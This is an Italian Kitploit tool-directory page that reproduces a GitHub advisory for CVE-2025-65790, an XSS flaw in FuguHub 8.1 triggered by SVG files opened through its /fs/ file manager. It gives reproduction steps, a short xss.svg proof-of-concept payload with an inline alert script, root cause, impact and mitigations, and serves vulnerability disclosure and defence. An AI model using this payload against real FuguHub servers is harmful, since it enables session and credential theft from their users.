Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790 — Cross-Site Scripting (XSS) riflesso tramite rendering SVG in FuguHub | Kitploit
Strumenti/GitHubGitHub/hunterxxx/fuguhub-8.1-reflected-svg-xss-cve-2025-65790
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubhunterxxx/fuguhub-8.1-reflected-svg-xss-cve-2025-65790

FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790

Cross-Site Scripting (XSS) riflesso tramite rendering SVG in FuguHub

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
17 mesi faNon ancora revisionato

CVE-2025-65790 - FuguHub 8.1 XSS SVG Riflesso

Cross-Site Scripting Riflesso (XSS) tramite rendering SVG in FuguHub

https://www.cve.org/CVERecord?id=CVE-2025-65790

Questo repository documenta una vulnerabilità di Cross-Site Scripting Riflesso (XSS) in FuguHub 8.1, in cui i file SVG contenenti JavaScript inline vengono eseguiti quando visualizzati tramite l'interfaccia del file manager interno /fs/.

CVE Assegnato: CVE-2025-65790
Scoperto da: Han Tek Foo
Gravità: Alta
Impatto: Esecuzione arbitraria di JavaScript

Introduzione

FuguHub è un server media cloud sviluppato da Real Time Logic / Sesamt Data AB. Durante il test di un'installazione predefinita, è stata identificata una vulnerabilità di cross-site scripting riflesso (XSS) nella gestione dei file SVG serviti tramite il file manager integrato di FuguHub. Il JavaScript dannoso incorporato in un file SVG viene eseguito automaticamente quando il file viene aperto tramite l'interfaccia /fs/. Ciò consente a un attaccante remoto di eseguire JavaScript arbitrario nel browser della vittima.

Ambiente di test

Sistema operativo: Debian Linux (installazione pulita)

Versione di FuguHub: Ultimo download al 12/11/2025

URL testato:

http://127.0.0.1/fs/

FuguHub non mostra un numero di versione esplicito nell'interfaccia utente. Il test è stato effettuato su un'installazione pulita direttamente dalla pagina di download ufficiale.

Prova di concetto

Prima, scarica ed esegui l'ultima versione di FuguHub:

wget https://fuguhub.com/install/FuguHub.linux.install

chmod +x FuguHub.linux.install

sudo ./FuguHub.linux.install

  1. Vai alla sezione Web-File-Server e accedi a Web File Manager:

alt text

  1. In Web File Manager, carica xss.svg:

alt text

  1. Caricamento riuscito di xss.svg

alt text

  1. Cliccando su xss.svg, il browser attiva l'XSS e l'alert mostra il dominio "127.0.0.1" tramite alert(document.domain), confermando l'XSS riflesso.

alt text

Di seguito il codice xss.svg che ho usato nel PoC:

root@kitploit:~
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">  
      alert(document.domain);
   </script>
</svg>

🧩 Causa principale

FuguHub serve i file SVG direttamente senza sanificazione o filtraggio degli script. I browser trattano gli SVG come contenuto XML attivo ed eseguono gli elementi <script> inline, generando XSS riflesso.

🛡 Impatto

L'esecuzione di JavaScript controllato dall'attaccante può portare a:

  • Furto di credenziali/sessione (se i cookie non sono HttpOnly)
  • Manipolazione dell'interfaccia utente, phishing
  • Azioni forzate dell'utente all'interno dell'applicazione
  • Espansione della superficie di attacco tra utenti

🛠 Raccomandazioni per la mitigazione

  • Rimuovere i tag <script> e gli attributi evento dai file SVG
  • Disabilitare l'esecuzione di script inline o imporre il sandboxing
  • Applicare una Content-Security-Policy (CSP) forte
  • Limitare il caricamento di SVG o convertirli in raster (PNG)
  • Sanificare/analizzare gli SVG prima di servirli tramite /fs/

🏷 Informazioni CVE

Questo problema è stato assegnato CVE-2025-65790 da MITRE.

Per portare lo stato CVE da RESERVED → PUBLIC, questo repository viene inviato a MITRE come URL di riferimento pubblico.

Crediti

Scoperto da:
Han Tek Foo

Scarica lo strumento